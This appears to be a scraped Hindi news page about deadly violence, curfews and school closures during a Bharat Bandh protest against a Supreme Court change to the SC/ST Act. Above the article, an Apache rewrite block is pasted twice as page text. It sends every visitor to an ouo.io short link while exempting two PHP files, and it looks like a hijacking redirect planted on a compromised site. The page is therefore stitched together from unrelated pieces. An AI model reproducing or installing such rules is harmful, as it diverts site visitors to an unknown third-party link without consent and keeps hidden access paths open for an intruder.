
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 369
नई दिल्ली। सुप्रीम कोर्ट द्वारा एससी/एसटी एक्ट में किए गए संशोधन के विरोध में दलित संगठनों द्वारा कल किए गए भारत बंद के दौरान हिंसा का जबर्दस्त तांडव रहा। इस दौरान देश के कई हिस्सों में आगजनी और उपद्रव की घटनाएं हुईं। इन हिंसक घटनाओं में देश के 10 राज्य बुरी तरह से झुलसे नजर आए। पूरे देश से 11 लोगों की मौत हो गई। मध्य प्रदेश से सबसे ज्यादा 6 लोगों ने अपनी जान गंवाई वहीं उत्तर प्रदेश से 3 और राजस्थान से एक की मौत हो गई। इस हिंसक प्रदर्शन के बाद केंद्र ने हिंसा वाले राज्यों से रिपोर्ट मांगी है। साथ ही आज एहतियात बरतते हुए कई राज्यों में स्कूल-कॉलेज को बंद रखने के आदेश दिये गए हैं। प्रदर्शन को देखते हुए देश में कई जगहों पर कर्फ्यू लागू कर दिया गया है और सैकड़ों लोगों को हिरासत में लिया गया। केंद्र सरकार ने यूपी, मध्य प्रदेश, राजस्थान, पंजाब और बिहार से हिंसा पर रिपोर्ट मांगी है और जान-माल की सुरक्षा सुनिश्चित करने के लिए एहतियाती कदम उठाने और कानून-व्यवस्था बनाये रखने का निर्देश दिया है। मध्य प्रदेश, उत्तर प्रदेश, राजस्थान, बिहार और पंजाब सहित अन्य स्थानों पर आगजनी, गोलीबारी और तोड़फोड़ की खबरों के बीच कई राज्यों ने बंद के मद्देनजर स्कूल-कॉलेजों को बंद रखने का आदेश दिया है।